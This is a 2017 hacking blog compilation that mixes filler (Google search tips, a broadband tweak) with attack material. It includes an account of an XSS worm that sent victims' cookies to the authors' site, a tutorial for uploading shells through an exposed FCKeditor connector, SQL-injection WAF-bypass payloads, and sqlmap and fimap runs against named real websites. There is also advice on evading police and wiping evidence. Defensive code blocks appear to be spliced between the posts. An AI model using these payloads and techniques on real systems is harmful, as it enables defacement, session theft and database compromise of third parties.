Wednesday, 29 March 2017

Creating an XSS Worm

XSS worms are pretty neat: interactive worms that propagate by using a client's browser to progressively infect other profiles in some way. I wrote my own worm a while back, and I wanted to talk about how it worked, how effective it was, and what challenges I faced.




The worm I created was in Justin.tv. The best thing about XSS worms is that they're as unique as the XSS. Tons of different things may occur, and whether the worm is successful depends on many different variables.


The XSS in justin.tv was found by x2Fusion. x2Fusion and I worked on the worm right when we came up with the idea of making one.


The XSS was in the Location field. So, people viewing another user's profile would run whatever we put there, as it was not sanitized. But there was one more challenge: the location was also placed in the title, sanitized. We had to find a way not only to hide the worm in the title, but also to implement some JavaScript that automatically changed the title as soon as it loaded.


Once we started on the worm, we made the .js file on an external website, and before the script inclusion we put several HTML comment tags to hide it in the title. In the location field we put local JavaScript that dynamically removed the title, keeping it as stealthy as possible to avoid other issues. The local JavaScript also made a hidden, blank iframe that we could reference from the remote JavaScript.


To start off, the remote JavaScript would point the iframe at our website and dynamically pass it the client's cookies and profile location. We would use this to track which profiles were infected by whom, and when, along with all of the client details at the time.


We would create the payload inside the remote JavaScript that we could use to inject into the viewing user's profile. The "payload" data is pretty much our local JavaScript. We also added a ^ character (a rare location element, if you ask me) after the user's location, which our local JavaScript would use to manage the dynamic script.


What we didn't think about (well... we were in a hurry, so it's not our fault) was that the ^ would remain in the titles. People would definitely notice, but it wasn't patched until about 24 hours later.


We printed a new (hidden) iframe and used it to read out the details in convenient little sub-frame form elements. We took the elements and processed them, changing the Location field only if it wasn't already infected, and then sending the request (again, only if it wasn't already infected).


This was more complicated than it seemed... we had to fight between IE and Firefox (Safari follows Firefox for the most part) compatibility. After doing that, we realized... if the infected person was... well, an actual broadcaster, the default page wasn't what we were looking for. Thus, we needed to dynamically read whether certain elements were present on the page, and also go to the correctly named page.


We had another request, upon each new infection, that saved the user's details.


Once the request was sent, by then it was assumed the profile was infected and we had it recorded on our side. In fact, quickly after we released it, I made a quick little PHP script that waited for more accounts to be infected (and their user details), printed out a highlighted table element and had it fade out after 5 seconds. After about 1500 profiles, I sat there watching 4 to 10 be infected a second, and it was funny to watch them be infected live.
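As an added example (not part of the original post, and not the worm's own code), here is a Python sketch of the server-side bug the post describes: the Location field escaped in the title but rendered raw in the page body, beside a hardened renderer that escapes both and validates the field on input. The payload string, host name and page layout are constructed for this example.

```python
import html
import re

# Constructed payload in the shape the post describes: HTML comment tags around
# a remote script include, plus a '^' marker after the real location. The host
# name is made up for this example.
WORM_LOCATION = ('Seattle^<!-- --><script src="http://attacker.example/worm.js">'
                 '</script><!-- -->')

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
# Allow-list for a free-text location: letters, digits, space, comma, period,
# apostrophe, hyphen, at most 64 characters. Assumed policy for this example.
LOCATION_OK = re.compile(r"^[A-Za-z0-9 ,.'\-]{1,64}$")


def render_profile_vulnerable(location: str) -> str:
    """The bug the post describes: escaped in <title>, raw in the page body."""
    return (f"<title>{html.escape(location)}'s profile</title>\n"
            f'<div id="location">{location}</div>')


def render_profile_hardened(location: str) -> str:
    """Escape for the HTML text context everywhere the value appears."""
    safe = html.escape(location, quote=True)
    return (f"<title>{safe}'s profile</title>\n"
            f'<div id="location">{safe}</div>')


def validate_location(location: str):
    """Allow-list validation on input; returns None when the value is rejected.
    This alone would have stopped this worm (no '<', no '^'), but output
    escaping is still required because stored data reaches many templates."""
    return location if LOCATION_OK.match(location) else None


def executes_script(rendered_html: str) -> bool:
    """Crude stand-in for a browser: does a live <script> tag survive rendering?"""
    return SCRIPT_TAG.search(rendered_html) is not None
```

Both defences belong together: the allow-list keeps the stored value clean, and context-aware escaping at render time protects every page that prints the field, including the title the original site already escaped.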

***Thanks***

For more Videos and tutorials please follow us on:

Like FB page /theprohackers2017
Join Pro Hackers Group: /groups/group.prohackers/
YouTube Channel: /channel/UCcyYSi1sh1SmyMlGfB-Vq6A
Website: www.prohackers[dot]in

Sunday, 26 March 2017

5 Most Common Mistakes Done by Beginners in the field of Hacking

This post is for everyone out there who actually wants to become a true hacker:





1) Never trust sites that ask you for money in return for hacking software, or that claim to hack email IDs for money. All such things are scams. Nothing works.



2) There is NO DIRECT SOFTWARE to hack Facebook, Google, Yahoo or any other big website. All software that claims to do so is a scam. It is just meant to take your money and, in worse cases, comes bundled with trojans or keyloggers. As a result your own account gets hacked while you are trying to hack others.



3) NEVER EVER use the keyloggers or trojans you find as freeware on the internet. Hackers are not fools. They bundle their own keyloggers and trojans with almost any such software, and when you install it, you are already hacked before even trying to hack others.



4) You are never going to be a good hacker without knowledge of programming and scripting languages. If you only use ready-made software and depend on it for hacking anything, then your capabilities are limited to the capabilities of that software. If you are not going to use your brain, just copying and pasting, then how can you even think of being a good hacker?



5) If you are a good hacker, you have already become a good programmer, a good script writer, a good web developer and an excellent security expert. Any good hacker will (and should) have good knowledge of various fields and programming languages. To do XSS (Cross-Site Scripting), PHP injection, SQL injection, phishing, footprinting etc. you will have to be good at programming and scripting. And when you know the various loopholes, vulnerabilities and security tips, you have already become a computer security expert.

So never underestimate the term Hacker. A hacker is not a person who just hacks email IDs or servers; a true hacker is a computer genius who knows computers better than anyone.



Next time, think before asking the question "How much will I get in this field?" because, if you have so many skills, you really don't have to run after money. Success comes and money follows by itself.

***THANKS***

Increase Broadband Speed Using Simple Tweak

A simple tweak (Windows XP Professional only) that is widely claimed to increase your broadband speed. One caveat before you start: the QoS Packet Scheduler only uses its 20% reservation while a QoS-aware application is actually requesting priority bandwidth, so on most home systems setting the limit to 0% makes no measurable difference. The change is harmless, but do not expect a faster line.




Make sure you Log on as Administrator, not as a user with Administrator privileges.


Follow the steps as given below-


1) Click on Start Button.


2) Select Run From Start Menu.


3) Type gpedit.msc


4) Expand the [Administrative Templates] branch.


5) Then Expand the [Network] branch.


6) Highlight(Select by Single Click) [QoS Packet Scheduler]


7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)


8) Check(Select By Single Click on it) [Enabled]


9) Change [Bandwidth limit %] to 0 %


10) Click [OK] Button.


11) Restart Your PC.


12) Now Check Your Broadband Speed.

***THANKS***

Thursday, 23 March 2017

How To Upload a Deface Page Remotely

This method is also known as the OpenCart CMS (web shop) exploit. It's an old vulnerability, but many people don't know about it, so I'm publishing a tutorial here.




1- Open Google.com and enter the dork:

inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

or

inurl:Powered By OpenCart

You'll get a lot of websites from Google. Select any one... For example, I got one called "School Shopper Home Page". Then I simply add the vulnerable path after the website address:


Example:
http://<site>/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html (the page that opens is titled "FCKeditor - Connectors Tests")


(The path may be different on other websites, e.g. examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)


Now a page will open like this (screenshot not reproduced here).


Look at the Connector option at the top left of the page and change the connector to PHP (screenshot not reproduced here).


Now use the file upload option to upload your deface page or shell, and to check it, open the uploaded file's URL:
www.site.com/deface.html

or

www.site.com/shell.php

(Depending on the connector's configured UserFilesPath, the file may land under a subfolder such as /userfiles/file/ instead of the web root; the upload response shows the actual path.)
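An added example (not from the original post): a Python check for whether a site exposes the FCKeditor file-manager test page and PHP connector under the OpenCart path above, suitable for auditing your own installations. connector.php and upload.php are the PHP connector files shipped with FCKeditor 2.x alongside test.html; the fetch function is injectable so the logic can be exercised offline with a constructed fake server, and the host names in any test are made up.

```python
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# OpenCart's FCKeditor prefix from the post; other applications mount
# FCKeditor elsewhere, so adjust FCK_BASE for those.
FCK_BASE = "admin/view/javascript/fckeditor/editor/filemanager/connectors/"
TEST_PAGE = FCK_BASE + "test.html"
# GetFolders is the cheapest connector command; a working connector answers
# with an XML listing, a disabled one with an <Error> saying it is disabled.
PHP_CONNECTOR = (FCK_BASE + "php/connector.php"
                 "?Command=GetFolders&Type=File&CurrentFolder=%2F")
PHP_UPLOAD = FCK_BASE + "php/upload.php"


def http_get(url: str, timeout: float = 5.0):
    """Return (status, first 4 KiB of body); status 0 on network failure."""
    req = Request(url, headers={"User-Agent": "fckeditor-exposure-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, ""
    except URLError:
        return 0, ""


def audit_fckeditor(base_url: str, fetch=http_get) -> dict:
    """Report which parts of the FCKeditor file manager a site exposes.
    `fetch` is injectable (same signature as http_get) for offline testing."""
    base = base_url.rstrip("/") + "/"
    status, _ = fetch(base + TEST_PAGE)
    test_page = status == 200
    status, body = fetch(base + PHP_CONNECTOR)
    # A disabled connector still answers 200, but with an error message
    # containing "disabled"; only a real listing means uploads are reachable.
    connector_enabled = status == 200 and "disabled" not in body.lower()
    status, _ = fetch(base + PHP_UPLOAD)
    upload_present = status == 200
    return {
        "test_page": test_page,
        "php_connector_enabled": connector_enabled,
        "php_upload_present": upload_present,
        "exploitable": connector_enabled,
    }


if __name__ == "__main__":
    import sys
    print(audit_fckeditor(sys.argv[1]))
```

Run it as `python3 fck_check.py https://shop.example` against sites you are authorised to test. The fix on the server side is to delete the whole `filemanager` directory (or at least the `connectors` and test pages) from production, since the connector's own `Enabled` flag is easily left on.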

***Thanks***

Bypassing WAF Filters in SQLi

What is a WAF or Web Application Firewall?

A web application firewall (WAF) is an appliance,server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.




Some websites use a WAF filter.

If you find a vulnerable site that has a WAF and you try to inject a UNION-based query and it shows "Not Acceptable", "403 Forbidden" or a "Web Application Firewall ALERT", that means the query or syntax you injected is filtered or blocked by the WAF.


OK, now here are some methods to bypass WAF filters.


1)Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of web application firewalls and to kill certain SQL statements, executing the attacker's commands while commenting out the rest of the legitimate query. Some comments in SQL:


//, -- , /**/, #, --+, -- -, ;



2)Case Changing:

Some WAFs will filter only lowercase attacks. As we can see, we can easily evade this by changing case:
Possible regex filter:


/union\sselect/g
id=1+UnIoN/**/SeLeCT, or with XSS -> <ScRiPt>alert(1)</ScRiPt>


3)Inline Comments:

Some WAFs filter keywords like /union\sselect/ig. We can bypass this filter by using inline comments most of the time. More complex examples will require a more advanced approach, like adding SQL keywords that further separate the two words:


id=1/*!UnIoN*/SeLeCT


Take note of the exclamation point in /*!code*/: MySQL treats /*! ... */ as a conditional comment and executes its contents, while most other parsers (and many WAFs) see only a comment.
Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can add more inline comments. For example, let's pretend a site filters union, where, table_name, table_schema, =, and information_schema. These are the keywords we need to inject our target.
For this we would:


id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*!information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -

(Note that information_schema needs the ! as well; a plain /*information_schema*/ is stripped by MySQL and the query breaks.)


The above code would bypass the filter. Notice we can use 'like' instead of '='.
Another way to use inline comments, when everything seems to fail, is to try to throw the application firewall off by crafting a SQL statement using variables:


id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- -


The above code should bypass the UNION SELECT filters even where common inline comments didn't work by themselves.


4) Buffer overflow / unexpected input:

A lot of WAFs are written in C, making them prone to overflows or to behaving differently when loaded with a lot of data. Here is a WAF that does its job correctly, but when given a large amount of data lets the malicious request and response through:


id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA[1000 more A's])+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+


This bypass above works. I myself just used this against a Web site recently.


5) Replaced keywords (preg_replace and/or WAFs with the same action):

Sometimes an application will remove every occurrence of a keyword. For instance, let's say we have a filter that replaces union and select with whitespace (or with nothing). We could bypass that filter like so:


id=1+UNIunionON+SeLselectECT+1,2,3--


As you can see, once union and select have been removed, our capital UNION and SELECT take their place, successfully injecting our query:


UNION+SELECT+1,2,3--


6)Character encoding:

Most WAFs will decode and filter an application's input, but some WAFs only decode the input once, so double encoding can bypass certain filters: the WAF decodes the input once and then filters, while the application keeps decoding the SQL statement and executes our code.
Examples of double encoding:


id=1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+
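To see why these bypasses work against a regex blocklist, here is an added Python example (not from the original post) modelling a toy WAF that URL-decodes a parameter once and matches /union\sselect/ with and without the i flag, a keyword-stripping filter of the kind in item 5, and a crude normaliser approximating what MySQL actually executes (double decoding, + as space, /*! */ kept, /* */ dropped). The payloads are the ones from the items above; the WAF and the normaliser are constructed approximations, not a real product or a SQL parser.

```python
import re
from urllib.parse import unquote

# Two toy blocklist WAFs of the kind the post is evading. Both URL-decode the
# parameter exactly once before matching (the double-decoding gap of item 6).
_UNION_SELECT_CS = re.compile(r"union\sselect")                # item 2's filter
_UNION_SELECT_CI = re.compile(r"union\sselect", re.IGNORECASE)  # item 3's filter


def waf_allows(raw_param: str, case_insensitive: bool = True) -> bool:
    """True if the request would get past the regex blocklist."""
    pattern = _UNION_SELECT_CI if case_insensitive else _UNION_SELECT_CS
    return pattern.search(unquote(raw_param)) is None


def keyword_stripping_filter(raw_param: str) -> str:
    """Item 5: a filter that deletes the keywords instead of blocking."""
    return re.sub(r"union|select", "", raw_param, flags=re.IGNORECASE)


def sql_as_executed(raw_param: str) -> str:
    """Approximate the text MySQL ends up parsing: the web server decodes once
    and the application decodes again, '+' is a space, /*! ... */ keeps its
    body (MySQL executes conditional comments) and /* ... */ is dropped.
    A crude normaliser for illustration, not a SQL parser."""
    s = unquote(unquote(raw_param)).replace("+", " ")
    s = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", s)   # conditional comment: kept
    s = re.sub(r"/\*.*?\*/", " ", s)                 # plain comment: removed
    return re.sub(r"\s+", " ", s).strip()


def contains_union_select(sql: str) -> bool:
    return re.search(r"\bunion\s+select\b", sql, re.IGNORECASE) is not None


# The post's payloads for items 2, 3 and 6, minus the trailing comment.
PAYLOADS = {
    "case_change":    "1+UnIoN/**/SeLeCT+1,2,3",
    "inline_comment": "1/*!UnIoN*/SeLeCT+1,2,3",
    "double_encode":  "1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,3",
}


def evasions() -> dict:
    """For each payload: (passes the case-insensitive WAF?, UNION SELECT reaches the DB?)."""
    return {name: (waf_allows(p), contains_union_select(sql_as_executed(p)))
            for name, p in PAYLOADS.items()}


def stripped_keyword_evasion() -> str:
    """Item 5: what survives the keyword-stripping filter."""
    return sql_as_executed(keyword_stripping_filter("1+UNIunionON+SeLselectECT+1,2,3"))
```

The takeaway is not a better regex: sql_as_executed is itself only an approximation, and every real WAF faces the same gap between what it matches and what the database parses. Parameterized queries close that gap; the filter is defence in depth at best.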

***Thanks***

Tuesday, 21 March 2017

101 Google Tips, Tricks and Hacks

Looking for the ultimate tips for Google searching? You've just found the only guide to Google you need. Let's get started:



1. The best way to begin searching harder with Google is by clicking the Advanced Search link.

2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box.

3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus.

4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results.

5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features.

6. Save time – most of these advanced features are also available in Google's front page search box, as command line parameters.

7. Google's main search invisibly combines search terms with the Boolean construct "AND". When you enter smoke fire – it looks for smoke AND fire.

8. To make Google search for smoke or fire, just type smoke OR fire

9. Instead of OR you can type the | symbol, like this: smoke | fire

10. Boolean connectors like AND and OR are case sensitive. They must be upper case.

11. Search for a specific term, then one keyword OR another by grouping them with parentheses, like this: water (smoke OR fire)

12. To look for phrases, put them in quotes: "there's no smoke without fire"

13. Synonym search looks for words that mean similar things. Use the tilde symbol before your keyword, like this: ~eggplant

14. Exclude specific key words with the minus operator. new pram -ebay excludes all results from eBay.

15. Common words, like I, and, then and if are ignored by Google. These are called "stop words".

16. The plus operator makes sure stop words are included. Like: fish +and chips

17. If a stop word is included in a phrase between quote marks as a phrase, the word is searched for.

18. You can also ask Google to fill in a blank. Try: Christopher Columbus discovered *

19. Search for a numerical range using the numrange operator. For example, search for Sony TV between £300 and £500 with the string Sony TV £300..£500

20. Google recognises 13 main file types through advanced search, including all Microsoft Office Document types, Lotus, PostScript, Shockwave Flash and plain text files.

21. Search for any filetype directly using the modifier filetype:[filetype extension]. For example: soccer filetype:pdf

22. Exclude entire file types, using the same Boolean syntax we used to exclude key words earlier: rugby -filetype:doc

23. In fact, you can combine any Boolean search operators, as long as your syntax is correct. An example: "sausage and mash" -onions filetype:doc

24. Google has some very powerful, hidden search parameters, too. For example "intitle" only searches page titles. Try intitle:herbs

25. If you're looking for files rather than pages – give index of as the intitle: parameter. It helps you find web and FTP directories.

26. The modifier inurl only searches the web address of a page: give inurl:spices a go.

27. Find live webcams by searching for: inurl:view/view.shtml

28. The modifier inanchor is very specific, only finding results in text used in page links.

29. Want to know how many links there are to a site? Try link:sitename – for example link:www.mozilla.org

30. Similarly, you can find pages that Google thinks are related in content, using the related: modifier. Use it like this: related:www.microsoft.com

31. The modifier info:site_name returns information about the specified page.

32. Alternatively, do a normal search then click the "Similar Pages" link next to a result.

33. Specify a site to search with the site: modifier – like this: search tips site:www.techradar.com

34. The above tip works with directory sites like www.dmoz.org and dynamically generated sites.

35. Access Google Directory – a database of handpicked and rated sites – at directory.google.com

36. The Boolean operators intitle and inurl work in Google directory, as does OR.

37. Use the site: modifier when searching Google Images, at images.google.com. For example: dvd recorder site:www.amazon.co.uk

38. Similarly, using "site:.com" will only return results from .com domains.

39. Google News (news.google.com) has its own Boolean parameters. For example "intext" pulls terms from the body of a story.

40. If you use the operator "source:" in Google News, you can pick specific archives. For example: heather mills source:daily_mail

41. Using the "location:" filter enables you to return news from a chosen country. location:uk for example.

42. Similarly, Google Blogsearch (blogsearch.google.com) has its own syntax. You can search for a blog title, for example, using inblogtitle:

43. The general search engine can get very specific indeed. Try movie: to look for movie reviews.

44. The modifier film: works just as well!

45. Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you when and where local films are showing.

46. For a dedicated film search page, go to www.google.co.uk/movies

47. If you ticked "Remember this Location" when you searched for show times, the next time you can enter the name of a current film instead.

48. Google really likes movies. Try typing director: The Dark Knight into the main search box.

49. For cast lists, try cast: name_of_film

50. The modifier music: followed by a band, song or album returns music reviews.

51. Try searching for weather London – you'll get a full 4-day forecast.

52. There's also a built-in dictionary. Try define: in the search box.

53. Google stores the content of old sites. You can search this cache direct with the syntax keyword cache:site_url

54. Alternatively, enter cache:site_url into Google's search box to be taken direct to the stored site.

55. No calculator handy? Use Google's built in features. Try typing 12*15 and hitting "Google Search".

56. Google's calculator converts measurements and understands natural language. Type in 14 stones in kilos, for example.

57. It does currency conversion too. Try 200 pounds in euros

58. If you know the currency code you can type 200 GBP in EUR instead for more reliable results.

59. And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade.

60. Want to know how clever Google really is? Type 2476 in roman numerals, then hit "Google Search"...

61. You can personalise your Google experience by creating a Google account. Go to www.google.com/account/ then click "Create Account".

62. With a Google account there are lots more extras available. You'll get a free Gmail email account for one...

63. With your Google account, you can also personalise your front page. Click "iGoogle" to add blog and site feeds.

64. Click "Add a Tab" in iGoogle to add custom tabs. Google automatically populates them with suitable site suggestions.

65. iGoogle allows you to theme your page too. Click "Select Theme" to change the default look.

66. Some iGoogle themes change with time..."Sweet Dreams" is a theme that turns from day to night as you browse.

67. Click "More" under "Try something new" to access a full list of Google sites and new features.

68. "Custom Search" enables you to create a branded Google search for your own site.

69. An active, useful service missing from the list is "Personalised Search" – but you can access it via www.google.com/psearch when you're logged in.

70. This page lists searches you have recently made – and is divided into categories. Clicking "pause" stops Google from recording your history.

71. Click "Trends" to see the sites you visit most, the terms you enter most often and links you've clicked on!

72. Personalised Search also includes a bookmark facility – which enables you to save bookmarks online and access them from anywhere.

73. You can add bookmarks or access your bookmarks using the iGoogle Bookmarks gadget.

74. Did you know you can search within your returned results? Scroll down to the bottom of the search results page to find the link.

75. Search locally by appending your postcode to the end of query. For example Indian food BA1 2BW finds restaurants in Bath, with addresses and phone numbers!

76. Looking for a map? Just add map to the end of your query, like this: Leeds map

77. Google finds images just as easily and lists them at the top, when you add image to the end of your search.

78. Google Image Search recognises faces... add &imgtype=face to the end of the returned URL in the location bar, then hit enter to filter out pictures that aren't people.

79. Keeping an eye on stocks? Type stocks: followed by market ticker for the company and Google returns the data from Google Finance.

80. Enter the carrier and flight number in Google's main search box to return flight tracking information.

81. What time is it? Find out anywhere by typing time then the name of a place.

82. You may have noticed Google suggests alternate spellings for search terms – that's the built in spell checker!

83. You can invoke the spell checker directly by using spell: followed by your keyword.

84. Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your keyword.

85. Enter a statistics-based query like population of Britain into Google, and it will show you the answer at the top of its results.

86. If your search has non-English results, click "Translate this Page" to see it in English.

87. You can search foreign sites specifically by clicking "Language Tools", then choosing which countries' sites to translate your query to.

88. Other features on the language tools page include a translator for blocks of text you can type or cut and paste.

89. There's also a box that you can enter a direct URL into, translating to the chosen language.

90. Near the language tools link, you'll see the "Search Preferences". This handy page is full of secret functionality.

91. You can specify which languages Google returns results in, ticking as many (or few) boxes as you like.

92. Google's Safe Search protects you from explicit sexual content. You can choose to filter results more stringently or switch it off completely.

93. Google's default of 10 results a page can be increased to up to 100 in Search Preferences, too.

94. You can also set Google to open your search results in a new window.

95. Want to see what others are searching for or improve your page rank? Go to www.google.com/zeitgeist

96. Another useful, experimental search can be found at www.google.com/trends – where you can find the hottest search terms.

97. To compare the performance of two or more terms, enter them into the trends search box separated by commas.

98. Fancy searching Google in Klingon? Go to www.google.com/intl/xx-klingon

99. Perhaps the Swedish chef from the muppets is your role model instead? Check www.google.com/intl/xx-bork

100. Type answer to life, the universe and everything into Google. You may be surprised by the result...

101. It will also tell you the number of horns on a unicorn

***Thanks***

15 Ways To Help You Stay Out Of Jail, Ways To Survive As A Hacker

This article will show you some of the top ways the best hackers use to keep themselves hidden and out of jail, and to be a better hacker.

Note: This guide is for educational purposes only. I do not take any responsibility for anything that happens after reading the guide. I'm only telling you how to do this, not to do it. It's your decision.




1.Never tell anyone you are a hacker


2.Never hack without a proxy


3.Always use a proxy when doing anything remotely illegal


4.Never hack from your house


5.Never use your real name in a conversation or sign up sheet


6.Always use fake information when signing up for something such as an account


7.Never use the same password more than once


8.Never use a password that can be found in the dictionary


9.Always use a firewall


10.Never let the F.B.I. into your house without a warrant stating their intentions.


11.Never let the F.B.I. in period.


12.Always have a panic button that mass deletes all your questionable material.


13.Make sure that the deletion of your files is at least in compliance with the Department of Defense deletion protocol if you have time; the Gutmann method is the best.


14.Never hack from the same computer twice if possible


15.Always wave to cops


You might say to yourself that you do not follow one or more of these rules. This is why most hackers get caught. They forget to cover their tracks and get busted. The more rules you abide by, the better your chances are of staying hidden.

Some Uses of Perl and Python in Backtrack 5 r3

A little theory on how we can use Perl and Python. Let's go!!



asp-auditor is a Perl script that allows you to find useful information about an ASP.NET web server.
First go to the Backtrack 5 R3 menu entry: /Backtrack/Exploitation Tools/Web Exploitation Tools/asp-auditor.


The following appears:


Usage: ./asp-audit.pl [http://target/app/file.aspx] (opts)

(opts)
-bf   brute force ASP.NET version using JS Validate directories.

Now you see the following prompt:
root@bt:/pentest/web/asp-auditor#


To use the script you need to run the following syntax (the script file is asp-audit.pl):


perl asp-audit.pl http://website/page.aspx [options]


Then supply the target. I used this site: http://conalepsin.edu.mx/apps/chekt/Default.aspx


root@bt:/pentest/web/asp-auditor# perl asp-audit.pl http://conalepsin.edu.mx/apps/chekt/Default.aspx -bf
Sending initial probe request...
Sending path discovery request...
Sending ASP.NET validate discovery request...
Sending ASP.NET Apr/07 XSS Check
Sending application trace request...
Sending null remoter service request...


[ .NET Configuration Analysis ]


Server -> Microsoft-IIS/6.0
ADNVersion -> 2.0.50727


matches -> 2.0.50727.07 Version 2.0 (Visual Studio.NET 2005 CTP) Aug 2005
matches -> 2.0.50727.26 Version 2.0 (Visual Studio.NET 2005 RC / SQL Server 2005 CTP) Sep 2005
matches -> 2.0.50727.42 Version 2.0 RTM (Visual Studio.NET 2005 RTM / SQL Server 2005 RTM) Nov 2005
Sending brute force discovery requests...


Finding websites vulnerable to Cross-Site Scripting using Backtrack 5 R3. A little theory: cross-site scripting is a common web application vulnerability that allows a third party to inject JavaScript (or code in a similar scripting language) into the pages that other users view.


To begin, start Backtrack 5 R3; once it has started, open
Applications / Backtrack / Information Gathering / Web Application Analysis / Open Source Analysis / XSSed


The link points to the http://www.xssed.com/archive website, which displays a list of websites vulnerable to Cross-Site Scripting.


To prevent such attacks, every value entered by a user must be validated before it is used, and output must be encoded for the context it is written into (HTML, JavaScript, VBScript, PHP output, and so on).


Here I leave this brief manual on using the Fimap tool in Backtrack 5 R3. A little theory: Fimap is a tool written in Python that allows you to find and exploit RFI (Remote File Inclusion) and LFI (Local File Inclusion) vulnerabilities. Given an Internet connection, it can also search Google for potentially vulnerable websites.


To start, boot Backtrack 5 R3 and change into the /pentest/web/fimap directory:


root@bt:~# cd /pentest/web/fimap
root@bt:/pentest/web/fimap# ./fimap.py -u 'http://www.website/news.php?id=108'


You can also search for targets with Google dorks (fimap's Google scan mode, -g with a -q query):


root@bt:/pentest/web/fimap# ./fimap.py -g -q 'inurl:index.php?id='


When the website is vulnerable to remote file inclusion, a notification of the exploitation is displayed on the terminal. Fimap is a very good tool for administrators whose main objective is to improve the quality and security of their website.


SQLMAP
sqlmap in Backtrack 5 R3. A little theory: sqlmap is a tool to detect and exploit SQL injection vulnerabilities and, through them, obtain full access to the web site's database server, regardless of the operating system.


To use the tool, start Backtrack 5 R3 and change into the /pentest/database/sqlmap directory:


root@bt:# cd /pentest/database/sqlmap/


The following appears:


root@bt:/pentest/database/sqlmap#


Next step:


root@bt:/pentest/database/sqlmap# ls
doc lib plugins README.md sqlmap.conf sqlmap.py tamper udf
extra output procs shell _sqlmap.py _sqlmap.pyc txt xml


Then we write ./sqlmap.py -u http://www.weburl.com. I used the URL http://www.centro-lomas.com.ar:


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.centro-lomas.com.ar/detalles.php?id=1


sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org


[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
starting at 18:08:56


[18:08:57] [INFO] testing connection to the target url
[18:08:59] [INFO] testing if the url is stable, wait a few seconds
[18:09:00] [INFO] url is stable
[18:09:00] [INFO] testing if GET parameter 'id' is dynamic
[18:09:01] [INFO] confirming that GET parameter 'id' is dynamic
[18:09:01] [INFO] GET parameter 'id' is dynamic
[18:09:02] [INFO] heuristics detected web page charset 'ascii'
[18:09:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[18:09:02] [INFO] testing for SQL injection on GET parameter 'id'
[18:09:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:03] [WARNING] reflective value(s) found and filtering out
[18:09:04] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:09:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:09:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:09:16] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[18:09:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:09:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[18:09:16] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:09:18] [INFO] target url appears to have 6 columns in query
[18:09:19] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2747=2747


Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)


Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a7174773a), NULL, NULL, NULL, NULL, NULL#


Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---


[18:09:28] [INFO] the back-end DBMS is MySQL


web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
[18:09:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.centro-lomas.com.ar'
shutting down at 18:09:28


